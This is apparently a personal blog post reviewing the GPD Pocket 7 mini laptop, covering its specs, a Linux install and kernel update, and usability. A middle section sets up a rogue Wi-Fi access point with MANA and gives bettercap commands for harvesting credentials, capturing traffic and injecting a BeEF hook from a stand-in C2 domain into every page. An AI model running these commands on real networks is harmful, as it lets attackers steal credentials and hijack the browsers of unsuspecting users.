It’s no secret I’ve been recently playing with the GPD Pocket 7, an ultra small laptop which can run GNU/Linux and has more than decent hardware. Tablets are cool and everything, but I’ve been a fan of ultra portable Linux devices since the Sharp Zaurus series. Considering that a lot of people were interested I decided to write this post to share my impressions, installation procedure and configuration tips.

Specs

Let’s start with the hardware specs of this sweet little thing:

7-inch full-HD (1920×1200) IPS touch display

Intel Atom x7-Z8750 CPU (Quad Core) @ 1.6GHz

8GB RAM

128GB eMMC

7,000 mAh battery (12 hours battery life estimated)

802.11ac WiFi

Bluetooth 4.1

1x USB 3.0 Type-C

1x USB 3.0 Type-A

micro HDMI

3.5mm headphone jack

Not bad at all! right?

Installing GNU/Linux

Despite they should start shipping the Ubuntu 16.04 models in a few days (?), I decided to buy the Windows version, which means I had to install GNU/Linux from scratch and overcome/fix several hardware issues … since I’m a good guy, let me share with you the correct procedure :D

Download your GNU/Linux distribution ISO ( in my case, it was Ubuntu 17.04 ). Clone this repository and run the bootstrap-iso.sh script against the ISO file. Write the resulting ~/bootstrap.iso file to an USB drive using UNetBootin or whatever you like. Plug the USB drive to your GPD, turn it on and press the DEL button to enter BIOS and boot from it.

This will start the usual GNU/Linux installation procedure.

NOTE: Data on USB Type-C still does not work, but efforts are being made about it, we only need to wait.

Updating custom Kernel and stuff.

After installation and the routine system update, you might want to periodically update the fixes and custom kernel from the repository, in order to do so you should run the gpd-update script as root, this will take 2-3 hours since the kernel is going to be compiled on the device itself.

If you are running Ubuntu 17.04 as me and are experiencing this issue, you might want to do the following instead:

Make sure apt is not locked and you have internet connectivity first.

sudo rm -rf /usr/src/ansible-gpdpocket sudo git clone https://github.com/cawilliamson/ansible-gpdpocket.git /usr/src/ansible-gpdpocket cd /usr/src/ansible-gpdpocket sudo git reset --hard origin/master

Before you continue, edit the roles/boot/tasks/debian.yml file and remove this block from it:

- name: install intel-microcode (iso creation = no) apt: name=intel-microcode when: chroot == false tags: - boot

( Don’t worry, you already have Intel microcode installed )

And eventually start the update process itself:

sudo ANSIBLE_NOCOWS=1 ansible-playbook system.yml

After the update is over, reboot and you’re ready to go :)

Getting Offensive

At this point, you have a quad core Intel cpu, GNU/Linux and an USB 3.0 port, I mean, imagination is the limit!

Personally, I like to have an Anker Astro E7 powerbank connected to the USB Type-C and the hardware I need to the USB 3.0 port (maybe with some USB 3 hub, to have appropriate bandwidth, powered by the same powerbank), then I can attach pretty much whatever I want to it, including an Alfa antenna, an Ubertooth One (great also to have a 2.4Ghz portable spectrum analyzer!) or some SDR card (most of SDR applications will require the full bandwidth of the USB port, which means it’s unlikely you’ll be able to use something else at the same time).

Here’s a very ugly PoC of what I mean, I’m still waiting for a decent USB hub to be delivered by Amazon:

In its simplest form, my portable offensive configuration is:

GPD powered by the aforementioned powerbank.

Main WiFi card connected to my smartphone (which is tethering via WiFi AP) as upstream.

Alfa AWUS036NHR 2000mW with a HUACAM HCM82 8dBi dualband antenna for rogue AP and packet injection.

Sensepost MANA running in simple-nat mode.

mode. BetterCap for credentials harvesting, pcap capture and reporting.

sudo bettercap --no-spoofing --no-discovery -I YOUR_ALFA_INTERFACE -X

Or, if you feel really evil, you can also have the HTTP proxy inject your BEEF hook to every page:

sudo bettercap ...same as before... --proxy-module injectjs --js-url http://your-beef-c2-domain/hook.js

If you’ll make bettercap save everything to a pcap file, this file will contains the traffic of all the targets and it will potentially become very big, I suggest you to use the USB hub and attach an external drive as well. Then just make bettercap write to it with appropriate command line arguments for offline inspection and credentials harvesting.

sudo bettercap ...same... --sniffer-output /media/your/usbdrive/capture.pcap

… GOODBYE WIFI PINEAPPLE! :D

TL;DR: This device is awesome, expensive, but still, awesome.

Keyboard

Yes the layout is a very weird displaced QWERTY and yes the keys are small … you’ll get used to it unless you have very big hands.

Battery Life

I didn’t try the battery life as I always use the powerbank (the USB devices are draining power, that would kill the internal 7000mAh battery), but people said they achieved 3 hours of intense gaming on Windows, normal use on GNU/Linux should last quite long.

Display

Great definition and the touchscreen helps a lot navigating the menu … actually this is the very first time I find a touch screen to be really useful on Linux :D

Mouse

Yeah the “mouse” is crap, but usable … as I said, touchscreen FTW!

Price

Expensive, from 500 to 600 USD … it’s a little nice toy but you’ll have to pay for it.

Speed / Usability

Despite being an Atom, the CPU works great, as long as you don’t spawn 1000000000 apps you’ll do just fine … I mean, if you can run a rogue GSM BTS on a RPi, this hardware is actually more than just fine.

Connectivity

Internal WiFi is super stable and has decent coverage, Bluetooth also works great.

Check …